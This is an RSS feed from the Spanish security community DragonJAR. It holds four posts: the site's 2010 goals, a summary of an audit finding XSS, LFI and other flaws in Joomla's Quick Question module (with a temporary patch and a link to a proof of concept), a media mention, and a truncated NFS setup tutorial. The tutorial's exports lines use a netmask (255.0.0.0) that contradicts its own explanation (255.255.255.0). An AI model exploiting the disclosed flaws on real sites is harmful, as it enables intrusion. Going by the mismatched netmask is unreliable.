<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>La Comunidad DragonJAR &#187; General</title>
	<atom:link href="http://www.dragonjar.org/category/general/feed" rel="self" type="application/rss+xml" />
	<link>http://www.dragonjar.org</link>
	<description>Noticias de actualidad y seguridad informática, herramientas de seguridad, documentación y una excelente COMUNIDAD.</description>
	<lastBuildDate>Sat, 20 Mar 2010 05:32:23 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Nuestros propósitos para el 2010</title>
		<link>http://www.dragonjar.org/nuestros-propositos-para-el-2010.xhtml</link>
		<comments>http://www.dragonjar.org/nuestros-propositos-para-el-2010.xhtml#comments</comments>
		<pubDate>Sun, 03 Jan 2010 06:07:33 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[La Comunidad DragonJAR]]></category>
		<category><![CDATA[Proyectos]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3596</guid>
		<description><![CDATA[Después de realizar lo mejor del 2009 igual que el año pasado, este año también realizaremos nuestros propósitos para el 2010, en esta ocasión y como es la segunda vez, vamos a enumerar nuestros propósitos pasados para ver cuantos de ellos cumplimos y cuales no cumplimos.
Propósitos para el 2009 de La Comunidad DragonJAR

Publicar nuevo numero [...]]]></description>
			<content:encoded><![CDATA[<p>Después de realizar <a rel="nofollow" target="_blank" title="Enlace permanente a Lo mejor del 2009" rel="bookmark" href="../lo-mejor-del-2009.xhtml">lo mejor del 2009</a> igual que el año pasado, este año también realizaremos nuestros propósitos para el 2010, en esta ocasión y como es la segunda vez, vamos a enumerar nuestros propósitos pasados para ver cuantos de ellos <span style="color: #008000;"><strong>cumplimos</strong></span> y cuales <span style="color: #ff0000;"><strong>no cumplimos</strong></span>.<span id="more-3596"></span></p>
<p><strong>Propósitos para el </strong><strong>2009 de La Comunidad DragonJAR</strong></p>
<ul>
<li><strong><span style="color: #008000;">Publicar nuevo numero de nuestra ezine</span></strong><br />
Publicamos en el 2009 la 4ta edición de la <a rel="nofollow" target="_blank" title="Enlace permanente a E-zine #4 Comunidad DragonJAR" rel="bookmark" href="../e-zine-4-comunidad-dragonjar.xhtml">E-zine Comunidad DragonJAR </a>, desde esta edición <a rel="nofollow" target="_blank" href="http://comunidad.dragonjar.org/f148/se-cumple-un-ciclo-en-dragonzine-la-ezine-de-nuestra-comunidad-8460/">epsilon77 decide dejar la dirección de la ezine</a>, para darle el espacio a <a rel="nofollow" target="_blank" rel="nofollow" href="http://comunidad.dragonjar.org/members/seifreed/">Seifreed</a> quien ahora tomara las riendas de nuestra revista y con quien esperamos mejorar el nivel del contenido y la regularidad con que publicamos nuevos números.</li>
</ul>
<ul>
<li><strong><span style="color: #008000;">Oficializar la Emisora en Temas de Seguridad</span></strong><br />
Dejamos a un lado las tertulias, la música y los podcast de otros para <a rel="nofollow" target="_blank" href="http://radio.dragonjar.org/">nutrir nuestra radio con contenido propio de calidad</a>. (faltan algunos contenidos por subir que ya fueron realizados)</li>
</ul>
<ul>
<li><strong><span style="color: #008000;">Elaborar la constancia y nivel técnico de los laboratorios</span></strong><br />
Gracias a 4v4t4r los laboratorios presenciales y virtuales,  fueron <a rel="nofollow" target="_blank" href="http://labs.dragonjar.org/indice-de-los-laboratorios">subiendo gradualmente el nivel técnico y la regularidad de publicación</a>, en el 2009 también vimos el nacimiento de <a rel="nofollow" target="_blank" href="http://www.sec-track.com/">sec-track</a>, un proyecto colaborativo que ofrece un repositorio de recursos relacionados con la implementación y desarrollo de laboratorios  de entrenamiento e investigación sobre Seguridad Informática.</li>
</ul>
<ul>
<li><strong><span style="color: #008000;">Realización de cursos básicos de nivelación</span></strong><br />
Desde el<a rel="nofollow" target="_blank" href="http://comunidad.dragonjar.org/"> foro de nuestra comunidad</a> y en especial en el subforo de <a rel="nofollow" target="_blank" href="http://comunidad.dragonjar.org/f151/">Principiantes</a> fomentamos la realización de vídeo tutoriales y guías básicas paso a paso con el fin de nivelar nuestros usuarios y todos hablemos un mismo idioma.</li>
</ul>
<ul>
<li><strong><span style="color: #008000;">Publicar mejor contenido en la web y mas periódicamente</span></strong><br />
Mas que un propósito para un año especifico, es un compromiso constante el ofrecerle a todos nuestros usuarios y visitantes contenido de calidad en nuestra comunidad, aunque pueden pasar algunos días sin actualizar siempre nos &#8220;<em>ponemos al día</em>&#8221; y con buen contenido.</li>
</ul>
<ul>
<li><strong><span style="color: #008000;">Tener representación en eventos como Campus Party, Flisol, Congresos</span></strong></li>
<li> Como siempre nuestra comunidad se deja ver en todos los eventos relacionados con la seguridad informática y el 2009 nueve no fue la excepción, nuestra comunidad resalto en la campus party <a rel="nofollow" target="_blank" href="http://altair.udea.edu.co/amistades-digitales-y-seguridad-informatica/">no solo en la parte académica</a> sino también como comunidad integradora realizando la primera <a rel="nofollow" target="_blank" title="Enlace permanente a DragoN Party 2009" rel="bookmark" href="../dragon-party-2009.xhtml">DragoN Party</a> un evento que reunió las diferentes comunidades tecnológicas de colombianas; En la primera la primera <a rel="nofollow" target="_blank" title="Permanent Link to Crónica sobre BarCamp Medellín 2009" rel="bookmark" href="../cronica-barcamp-medellin-2009.xhtml">BarCamp realizada en Medellín</a> la comunidad contó con dos(DragoN y 4v4t4r) ponentes cuyas &#8220;<em>desconferencias</em>&#8221; tuvieron una gran acogida.
<p>En el <a rel="nofollow" target="_blank" href="http://www.dragonjar.org/resumen-y-presentaciones-de-la-comunidad-dragonjar-en-el-flisol-2009.xhtml">FLISOL, la comunidad contó</a> con grandes representantes en los comités organizadores de las principales ciudades y ponentes con charlas como <a title="Enlace permanente a Seguridad Informática con Software Libre" rel="bookmark" href="../seguridad-informatica-con-software-libre.xhtml">Seguridad Informática con Software Libre</a>; En el <a href="http://www.dragonjar.org/tag/eisi">EISI (Encuentro Internacional de Seguridad Informática)</a>, el mejor evento de seguridad realizado en Colombia, la comunidad contó con una excelente representación, mas de 70 dragonautas asistieron al evento, contamos con 3 ponentes y <a href="http://www.dragonjar.org/eisi-iii-dia-3.xhtml">nos ganamos el wargame</a>.</li>
</ul>
<ul>
<li><span style="color: #ff0000;"><strong>Realizar nuestra distribución &#8220;Drux&#8221; basada en GNU Linux</strong></span><br />
<a rel="nofollow" target="_blank" href="http://comunidad.dragonjar.org/f147/">La realización del Drux</a> fue el propósito <strong>no realizado</strong> del 2009, aunque se <a rel="nofollow" target="_blank" href="http://comunidad.dragonjar.org/f147/coleccion-de-imagenes-de-drux-6938/">recuperaron algunos recursos</a> viejos, se discutió sobre los paquetes, se <a rel="nofollow" target="_blank" href="http://comunidad.dragonjar.org/f147/grupos-de-trabajo-drux-8521/">crearon grupos de trabajos</a>, se creó <a rel="nofollow" target="_blank" href="http://wiki.dragonjar.org/index.php/P%C3%A1gina_Principal">una wiki para documento</a>, aun no tenemos un alpha del drux que mostrar del Drux y es el propósito que nos falto cumplir para este año.</li>
</ul>
<p><strong>Con este buen balance dejado en el 2009, voy a exponer nuestros propósitos para el año 2010:</strong></p>
<ul>
<li>Con la ayuda de <a rel="nofollow" target="_blank" rel="nofollow" href="http://comunidad.dragonjar.org/members/seifreed/">Seifreed</a> y <a href="http://www.dragonjar.org/e-zine-4-comunidad-dragonjar.xhtml">todo el Staff de nuestra ezine</a>, publicar mas frecuentemente y con mejor calidad nuestra revista electrónica.</li>
<li>Crear nuestro vídeo podcast, un programa en vídeo donde hablaremos sobre temas de seguridad informática e integremos la radio y el contenido multimedia generado por nuestra comunidad en un solo lugar.</li>
<li>Retomar los laboratorios de nuestra comunidad y convertirlo en un espacio donde cualquier integrante de nuestra comunidad pueda publicar sus laboratorios, experimentos, pruebas, todo esto en el ámbito de la seguridad informática.</li>
<li>Contar con un equipo de editores calificados para que los visitantes y dragonautas encuentren siempre contenidos de calidad cuando visiten nuestro portal.</li>
<li>Realizar el wargame de la campus party colombia 2010, nuestra segunda dragon party (con aun mas acogida), contar cada vez con mas representación en calidad de ponentes en los diferentes eventos relacionados a la seguridad informática en nuestro país y el exterior.</li>
<li>Cambiar el logotipo (<a rel="nofollow" target="_blank" href="http://comunidad.dragonjar.org/f146/posible-nuevo-logo-para-la-comunidad-8658/">ayudanos a escoger</a>) y el diseño de nuestros sitios.</li>
<li>Realizar nuestra distribución &#8220;Drux&#8221; basada en GNU Linux</li>
</ul>
<p>Como algo personal me gustaría GANAR un premio este año, en el 2009 estuve cerca de ganar dos, pero en ambas ocasiones ocupe el segundo puesto, en el 2010 si los ganare <img src='http://www.dragonjar.org/wp-includes/images/smilies/icon_wink.gif' alt=';-)' class='wp-smiley' title="Nuestros propósitos para el 2010" /> </p>
<p>Esperamos este año poder cumplir con <strong>TODOS</strong> nuestros propósitos, recuerda que la comunidad y los proyectos en conjunto prometen y comprometen trabajo constante que solo serán posibles realizar si trabajamos en equipo.</p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/ezine-comunidad-dragonjar-online.xhtml" title="Ezine Comunidad DragonJAR Online">Ezine Comunidad DragonJAR Online</a></li><li><a href="http://www.dragonjar.org/nuestros-propositos-para-el-2009.xhtml" title="Nuestros propósitos para el 2009">Nuestros propósitos para el 2009</a></li><li><a href="http://www.dragonjar.org/combat-training-v2-0-en-colombia.xhtml" title="COMBAT Training v2.0 en Colombia">COMBAT Training v2.0 en Colombia</a></li><li><a href="http://www.dragonjar.org/boletin-de-la-comunidad-dragonjar-0008.xhtml" title="Boletín de La Comunidad DragonJAR #0008">Boletín de La Comunidad DragonJAR #0008</a></li><li><a href="http://www.dragonjar.org/confirmado-el-combat-training-en-colombia.xhtml" title="Confirmado el COMBAT Training en Colombia">Confirmado el COMBAT Training en Colombia</a></li><li><a href="http://www.dragonjar.org/boletin-de-la-comunidad-dragonjar-0007.xhtml" title="Boletín de La Comunidad DragonJAR #0007">Boletín de La Comunidad DragonJAR #0007</a></li><li><a href="http://www.dragonjar.org/finaliza-plazo-para-la-entrega-de-los-informes.xhtml" title="Finaliza plazo para la entrega de los Informes">Finaliza plazo para la entrega de los Informes</a></li><li><a href="http://www.dragonjar.org/nuevo-plazo-de-entrega-para-el-reto-forense.xhtml" title="Nuevo Plazo de Entrega para el Reto Forense">Nuevo Plazo de Entrega para el Reto Forense</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/nuestros-propositos-para-el-2010.xhtml/feed</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>Bug en el modulo Quick Question de Joomla</title>
		<link>http://www.dragonjar.org/bug-quick-question-joomla.xhtml</link>
		<comments>http://www.dragonjar.org/bug-quick-question-joomla.xhtml#comments</comments>
		<pubDate>Sun, 30 Aug 2009 06:23:34 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[Auditoria]]></category>
		<category><![CDATA[Bug]]></category>
		<category><![CDATA[Joomla]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3038</guid>
		<description><![CDATA[Gracias a PwnTnT en el foro me entero que el Centro de Estudios Superiores en Alta Tecnología en México realizo una especie de auditoria en el modulo Quick Question de Joomla encontrando mas de 7 fallos de seguridad en el mismo.

Algunas de las vulnerabilidades encontradas en este modulo de joomla son:

 Log&#8217;s Poisoning
 Massive Mail [...]]]></description>
			<content:encoded><![CDATA[<p>Gracias a <a rel="nofollow" target="_blank" rel="nofollow" href="http://comunidad.dragonjar.org/members/pwntnt/">PwnTnT</a> en el foro me entero que el <a rel="nofollow" target="_blank" onclick="pageTracker._trackPageview ('/salientes/http_anonym_url_com_go_php_to_http_www_ccat_edu_mx');" rel="nofollow" href="http://anonym-url.com/go.php?to=http://www.ccat.edu.mx" target="_blank">Centro de Estudios Superiores en Alta Tecnología</a> en México realizo una especie de auditoria en el modulo Quick Question de Joomla encontrando mas de 7 fallos de seguridad en el mismo.</p>
<p style="text-align: center;"><img class="alignnone" src="http://img17.imageshack.us/img17/9471/joomlalogo.png" alt="joomlalogo Bug en el modulo Quick Question de Joomla" width="300" height="205" title="Bug en el modulo Quick Question de Joomla" /></p>
<p>Algunas de las vulnerabilidades encontradas en este modulo de joomla son:</p>
<ol>
<li> Log&#8217;s Poisoning</li>
<li> Massive Mail Sending</li>
<li> Visible Log&#8217;s</li>
<li> XSS</li>
<li> Email Bombing</li>
<li> LFI</li>
<li> y muchas mas</li>
</ol>
<p><span id="more-3038"></span>Podemos ver un vídeo donde se explota algunas de las vulnerabilidades de este modulo de Joomla</p>
<p align="center"><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="344" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.youtube.com/v/o3th4dZLX9k&amp;hl=es&amp;fs=1" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="425" height="344" src="http://www.youtube.com/v/o3th4dZLX9k&amp;hl=es&amp;fs=1" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<p>La misma gente del <a rel="nofollow" target="_blank" onclick="pageTracker._trackPageview ('/salientes/http_anonym_url_com_go_php_to_http_www_ccat_edu_mx');" rel="nofollow" href="http://anonym-url.com/go.php?to=http://www.ccat.edu.mx" target="_blank">Centro de Estudios Superiores en Alta Tecnologia</a> ha publicado un parche temporal para solucionar estos fallos de seguridad, solo es necesario crear .htacces en la carpeta donde se ubica el archivo quickQuestionLog.txt, con el siguiente contenido:</p>
<p><code>RewriteCond %{REQUEST_URI} ^(quickQuestionLog.txt) [NC]<br />
RewriteRule ^.*$ - [F,L]</code></p>
<p>y colocar el siguiente código al inicio del archivo mod_quick_question_sendform.php:</p>
<p><code>foreach($_REQUEST as $key =&gt; $value) $_REQUEST[$key] = htmlentities($value);</code></p>
<p>Puedes <a rel="nofollow" target="_blank" href="http://www.ccat.edu.mx/advisors/advisor2/poc.rar">descargar una prueba de concepto y el full advisory de aqui</a>.</p>
<p><strong>Mas Información:</strong><br />
<a rel="nofollow" target="_blank" href="http://www.ccat.edu.mx/index.php?option=com_content&amp;view=article&amp;id=117:ccat-reserch-labs-advisor-no-2&amp;catid=50:advisor-&amp;Itemid=78">CCAT Research Lab`s &#8211; Advisor No. 2</a><br />
<a rel="nofollow" target="_blank" href="http://comunidad.dragonjar.org/f154/nuevos-bugs-en-joomla-8224/">Post en el foro</a></p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/multiples-vulnerabilidades-smf.xhtml" title="Multiples Vulnerabilidades en SMF">Multiples Vulnerabilidades en SMF</a></li><li><a href="http://www.dragonjar.org/xss-en-wordpress-2-8-1-actualiza-a-wordpress-2-8-2.xhtml" title="XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2">XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2</a></li><li><a href="http://www.dragonjar.org/wordpress-263-vulnerable-a-xss.xhtml" title="WordPress 2.6.3 vulnerable a Cross Site Scripting">WordPress 2.6.3 vulnerable a Cross Site Scripting</a></li><li><a href="http://www.dragonjar.org/robando-claves-por-xss-del-administrador-de-contrasenas-del-firefox.xhtml" title="Robando claves por XSS del Administrador de Contraseñas del Firefox">Robando claves por XSS del Administrador de Contraseñas del Firefox</a></li><li><a href="http://www.dragonjar.org/vulnerabilidad-0-day-todos-los-windows.xhtml" title="Vulnerabilidad 0-day en todas las versiones de Windows">Vulnerabilidad 0-day en todas las versiones de Windows</a></li><li><a href="http://www.dragonjar.org/vulnerabilidad-xss-8-millones-aplicaciones-flash.xhtml" title="Vulnerabilidad de XSS en mas de 8 Millones de Sitios con Flash">Vulnerabilidad de XSS en mas de 8 Millones de Sitios con Flash</a></li><li><a href="http://www.dragonjar.org/lista-de-tareas-auditar-db-oracle.xhtml" title="¿Que Mirar Cuando Auditamos una Base de Datos Oracle?">¿Que Mirar Cuando Auditamos una Base de Datos Oracle?</a></li><li><a href="http://www.dragonjar.org/xss-que-permite-postear-en-wordpress.xhtml" title="XSS que permite postear a atacante registrado en WordPress">XSS que permite postear a atacante registrado en WordPress</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/bug-quick-question-joomla.xhtml/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>La Comunidad DragonJAR en LemonTV.tv</title>
		<link>http://www.dragonjar.org/la-comunidad-dragonjar-en-lemontv-tv.xhtml</link>
		<comments>http://www.dragonjar.org/la-comunidad-dragonjar-en-lemontv-tv.xhtml#comments</comments>
		<pubDate>Tue, 25 Aug 2009 18:22:37 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[La Comunidad DragonJAR]]></category>
		<category><![CDATA[LemonTV]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[TV]]></category>
		<category><![CDATA[Video]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3029</guid>
		<description><![CDATA[LemonTV.tv es un vídeo podcast (o como dicen ellos, el primer programa de TV por internet en argentina) muy divertido, que intenta explicarnos la tecnología de manera simple y fácil de entender, agregándole también un toque de humor para que llegue a mucha mas gente.

En el episodio #400 de LemonTV donde hablan sobre las medidas [...]]]></description>
			<content:encoded><![CDATA[<p>LemonTV.tv es un vídeo podcast (o como dicen ellos, el primer programa de TV por internet en argentina) muy divertido, que intenta explicarnos la tecnología de manera simple y fácil de entender, agregándole también un toque de humor para que llegue a mucha mas gente.</p>
<p style="text-align: center;"><img class="aligncenter" title="LemonTV Logo" src="http://img443.imageshack.us/img443/2251/logokzd.png" alt="logokzd La Comunidad DragonJAR en LemonTV.tv" width="412" height="98" /></p>
<p>En el <a rel="nofollow" target="_blank" href="http://lemontv.tv/Programas/434/P400---Seguridad---Como-protegerse-de-Spyware-.aspx">episodio #400 de LemonTV</a> donde hablan sobre las medidas a tener en cuenta frente a los spyware,  Lucas y Facundo han realizado una pequeña reseña sobre la comunidad (minuto 2:29) donde recomiendan dragonjar.org a los  novatos y &#8220;entusiastas&#8221; de la seguridad informática, aquí les dejo el episodio completo no sin antes recomendarles que <a rel="nofollow" target="_blank" href="http://www.lemontv.tv">visisten LemonTV.tv</a>.<span id="more-3029"></span></p>
<p style="text-align: center;"><object id="flashcontrol" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="580" height="346" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="quality" value="High" /><param name="play" value="True" /><param name="loop" value="False" /><param name="menu" value="False" /><param name="scale" value="Showall" /><param name="flashvars" value="backcolor=0x000000&amp;frontcolor=0xCCCCCC&amp;lightcolor=0x333333&amp;file=http://www.lemontv.tv/Videos/P400martes.flv&amp;callback=http://www.lemontv.tv/videoVisualizadoExt.aspx?idVideo=434&amp;image=http://www.lemontv.tv/Videos/P400martes.jpg&amp;width=580&amp;height=346" /><param name="src" value="http://www.lemontv.tv/mediaplayer.swf" /><embed id="flashcontrol" type="application/x-shockwave-flash" width="580" height="346" src="http://www.lemontv.tv/mediaplayer.swf" flashvars="backcolor=0x000000&amp;frontcolor=0xCCCCCC&amp;lightcolor=0x333333&amp;file=http://www.lemontv.tv/Videos/P400martes.flv&amp;callback=http://www.lemontv.tv/videoVisualizadoExt.aspx?idVideo=434&amp;image=http://www.lemontv.tv/Videos/P400martes.jpg&amp;width=580&amp;height=346" scale="Showall" menu="False" loop="False" play="True" quality="High"></embed></object></p>
<p>Muchas Gracias por la mención y por el trabajo que realizan al acercar la tecnología a todos.</p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/memorias-del-disi-2009.xhtml" title="Memorias del DISI 2009">Memorias del DISI 2009</a></li><li><a href="http://www.dragonjar.org/boletin-de-la-comunidad-dragonjar-0008.xhtml" title="Boletín de La Comunidad DragonJAR #0008">Boletín de La Comunidad DragonJAR #0008</a></li><li><a href="http://www.dragonjar.org/boletin-de-la-comunidad-dragonjar-0007.xhtml" title="Boletín de La Comunidad DragonJAR #0007">Boletín de La Comunidad DragonJAR #0007</a></li><li><a href="http://www.dragonjar.org/video-explotando-wm-downloader.xhtml" title="Video: Explotando WM Downloader ">Video: Explotando WM Downloader </a></li><li><a href="http://www.dragonjar.org/video-introduccion-al-metasploit-framework-2.xhtml" title="Vídeo: Introducción al Metasploit Framework">Vídeo: Introducción al Metasploit Framework</a></li><li><a href="http://www.dragonjar.org/video-ataque-de-envenamiento-de-cookies-cookie-poisoning.xhtml" title="Video: Ataque de envenenamiento de cookies (Cookie-Poisoning)">Video: Ataque de envenenamiento de cookies (Cookie-Poisoning)</a></li><li><a href="http://www.dragonjar.org/boletin-de-la-comunidad-dragonjar-0006.xhtml" title="Boletín de La Comunidad DragonJAR #0006">Boletín de La Comunidad DragonJAR #0006</a></li><li><a href="http://www.dragonjar.org/boletin-de-la-comunidad-dragonjar-0005.xhtml" title="Boletín de La Comunidad DragonJAR #0005">Boletín de La Comunidad DragonJAR #0005</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/la-comunidad-dragonjar-en-lemontv-tv.xhtml/feed</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>NFS, Compartiendo archivos en red</title>
		<link>http://www.dragonjar.org/nfs-compartiendo-archivos-en-red.xhtml</link>
		<comments>http://www.dragonjar.org/nfs-compartiendo-archivos-en-red.xhtml#comments</comments>
		<pubDate>Sat, 22 Aug 2009 22:27:43 +0000</pubDate>
		<dc:creator>Cortex</dc:creator>
				<category><![CDATA[COMOs]]></category>
		<category><![CDATA[Documentacion]]></category>
		<category><![CDATA[GNU/Linux]]></category>
		<category><![CDATA[General]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=2987</guid>
		<description><![CDATA[

En mi hogar tengo dos equipos (laptop y escritorio) ambos con la meta-distribución Gentoo Linux instalada. Suelo utilizar el PC de Escritorio para almacenamiento por lo tanto ahí alojo gran parte de mi información. Necesito estar accediendo constántemente a este equipo para compartir/modificar los datos que tengo. Gracias a NFS puedo disponer de ellos como [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;">
<p style="text-align: center;"><img class="  aligncenter" src="http://img291.imageshack.us/img291/122/tuxgentoo.png" alt="Tux Gentoo" width="166" height="169" title="NFS, Compartiendo archivos en red" /></p>
<p>En mi hogar tengo dos equipos (laptop y escritorio) ambos con la meta-distribución <strong>Gentoo Linux</strong> instalada. Suelo utilizar el PC de Escritorio para almacenamiento por lo tanto ahí alojo gran parte de mi información. Necesito estar accediendo constántemente a este equipo para compartir/modificar los datos que tengo. Gracias a <strong>NFS</strong> puedo disponer de ellos como si de una carpeta más de mi sistema se tratara&#8230; veamos cómo podemos hacer uso de este protocolo para <em>hacer más fácil nuestra vida</em> <img src='http://www.dragonjar.org/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' title="NFS, Compartiendo archivos en red" /> </p>
<p><a rel="nofollow" target="_blank" title="NFS" href="http://es.wikipedia.org/wiki/Network_File_System"><strong>NFS</strong> <em><strong>(Network File System)</strong></em></a> es un protocolo de sistema de archivos en red desarrollado originalmente por Sun Microsystems en 1984, permitiéndole a un usuario en una máquina cliente acceder a los archivos en la red como si lo estuviera haciendo localmente. Es ampliamente usado en sistemas <strong>UNiX-like</strong> aunque también puede ser utilizado bajo plataformas <strong>Windows, Mac OS, Novell NetWare, </strong>entre otros.<span id="more-2987"></span></p>
<p>El proceso se llevará acabo como mencioné anteriormente haciendo uso de máquinas con <strong>GNU/Linux</strong>. En caso de que quieras disponer de un cliente NFS bajo una plataforma Windows, puedes consultar los enlaces que se encuentran al final del post.</p>
<h2>1. Habilitando el soporte para NFS en el kernel</h2>
<p>NFS es tratado como un sistema de archivos más en el núclo del sistema (así como ext3, ext4, ReiserFS&#8230;) , por lo tanto debes activar el soporte en el mismo. En caso de que estés utilizando distribuciones como <strong>Ubuntu, Debian, Fedora, Arch</strong> y un gran etcétera lo más probable es que ya se encuentre activado por defecto este sistema de archivos. En caso de que uses <strong>Gentoo</strong> ó configures tus propios núcleos:</p>
<p><strong>Servidor:</strong></p>
<pre>
<pre>File Systems  ---&gt;
  [*] Network File Systems  ---&gt;
    &lt;*&gt; NFS server support
      [*]   NFS server support for NFS version 3
      [ ]     NFS server support for the NFSv3 ACL protocol extension
      [ ]   NFS server support for NFS version 4 (EXPERIMENTAL)</pre>
</pre>
<p><strong>Cliente:</strong></p>
<pre>File Systems  ---&gt;
  [*] Network File Systems  ---&gt;
    &lt;*&gt;   NFS client support
      [*]    NFS client support for NFS version 3
      [ ]    NFS client support for the NFSv3 ACL protocol extension
      [ ]    NFS client support for NFS version 4 (EXPERIMENTAL)</pre>
<p>Después de haber configurado, lo de siempre, compilar instalar: <code>make &amp;&amp; make modules_install</code></p>
<h2>2. Instalar las utilidades para el espacio de usuario</h2>
<p>Ahora que ya tenemos activado el soporte en nuestro núcleo, debemos instalar las herramientas que nos permitirán hacer uso de este protocolo en nuestra distribución:</p>
<ul>
<li><strong>Cliente Ubuntu/Debian</strong>:</li>
<pre style="padding-left: 30px;">aptitude install nfs-kernel-server nfs-common portmap</pre>
<li><strong>Servidor Ubuntu/Debian</strong>:</li>
<pre style="padding-left: 30px;">aptitude install nfs-kernel-server nfs-common portmap</pre>
<li><strong>Fedora</strong>:</li>
<pre style="padding-left: 30px;">yum -y install system-config-nfs</pre>
<li><strong>ArchLinux</strong>:</li>
<pre style="padding-left: 30px;">pacman -S nfs-utils</pre>
<li><strong>Gentoo</strong>:</li>
<pre style="padding-left: 30px;">emerge -av nfs-utils</pre>
</ul>
<p>En general, para cualquier distribución es el mismo proceso, excepto que en algunas se cuenta con utilidades gráficas que facilitan la configuración (por ejemplo <strong>Fedora</strong>). Como mencioné anteriormente lo haré desde Gentoo pero casi la totalidad del texto te servirá.</p>
<p><strong>Empezaremos configurando el servidor.</strong></p>
<p>Para compartir un determinado directorio debemos editar el archivo <strong>/etc/exports</strong>. Ahí es donde se encuentra la información referente a los datos que se deben compartir y sus respectivos <em>permisos.</em> En mi caso quiero compartir dos particiones que tengo en el desktop: <strong>Warez</strong> y <strong>Stuff</strong> (particiones NTFS), así que <a title="Montar particiones en Windows haciendo uso de NTFS-3G" href="http://www.dragonjar.org/montar-particiones-windows-haciendo-uso-de-ntfs-3g.xhtml">primero deben estar montadas</a>.</p>
<p style="padding-left: 30px;"><code>mount -t ntfs-3g /dev/sda2 /media/Warez<br />
mount -t ntfs-3g /dev/sda3 /media/Stuff</code></p>
<p>Es recomendable automatizar un poco el proceso agregando las entradas necesarias a <em><strong>/etc/fstab</strong></em>. La dirección IP estática que tiene asignada mi laptop es: <strong>192.168.1.178. </strong>Quiero que únicamente esta dirección IP tenga acceso a estos datos, así que edito el archivo <em><strong>/etc/exports</strong></em><strong> </strong>y agrego las siguientes líneas:</p>
<pre style="padding-left: 30px;">/media/Stuff 192.168.1.178/255.0.0.0(async,rw,no_subtree_check)
/media/Warez 192.168.1.178/255.0.0.0(async,rw,no_subtree_check)</pre>
<p>Expliquemos un poco la estructura:</p>
<ul>
<li><strong>/media/Stuff:</strong> Es el directorio que quiero compartir. En caso de que quisieras compartir tu home simplemente reemplaza por <strong>/home/usuario</strong> ó lo que sea.</li>
<li><strong>192.168.1.178/255.255.255.0:</strong> Aquí estoy especificando la dirección IP que puede tener acceso a estos datos. En caso de que quieras compartir con <strong>cualquier equipo en la red</strong> bastaría con reemplazar la primera IP y por <strong>192.168.0.0.</strong></li>
<li><strong>(async,rw,no_subtree_check)</strong>: Estos son los <em>parametros</em> bajo los que se debe realizar la compartición. Veamos algunos de lo más usados e importantes:
<ul>
<li><strong>rw:</strong> Permite lectura y escritura.</li>
<li><strong>ro:</strong> Permite sólo lectura en el directorio.</li>
<li><strong>async:</strong> Responde los pedidos antes de ser realizados.<strong> ES IMPORTANTE</strong> hacer uso de este parámetro ya que aumenta el rendimiento y evita que ocurran cosas como que el disco se llene en mitad de envío ya que primero hace las comprobaciones necesarias y después las ejecuta.</li>
<li><strong>no_subtree_check:</strong> Deshabilita el chequeo del subárbol. Es recomendado al compartir directorios que cambien constántemente como <strong>/home</strong>. Más información <em>man exports.</em></li>
<li>Estas son las más esenciales, para profundizar un poco <a rel="nofollow" target="_blank" title="NFS Server - Gentoo" href="http://es.gentoo-wiki.com/wiki/NFS/Server#Compartiendo_Datos">puedes mirar aquí</a>.</li>
</ul>
</li>
</ul>
<p>Guardamos el archivo e iniciamos el demonio para empezar a compartir nuestros archivos:</p>
<pre style="padding-left: 30px;">/etc/init.d/nfs start</pre>
<p>En caso de que quieras que se inicie automáticamente en cada arranque del sistema <strong>(Gentoo)</strong>:</p>
<pre style="padding-left: 30px;">rc-update add nfs boot</pre>
<p>Y con esto terminamos de configurar el servidor. <strong> </strong></p>
<p><strong>Vamos ahora del lado del cliente</strong>.</p>
<p>Esta es la parte más sencilla de todas ya que simplemente basta con montar el directorio como si de una partición más se tratara. Quiero que los datos compartidos por NFS se encuentren en <strong>/mnt</strong> así que primero creo las carpetas:</p>
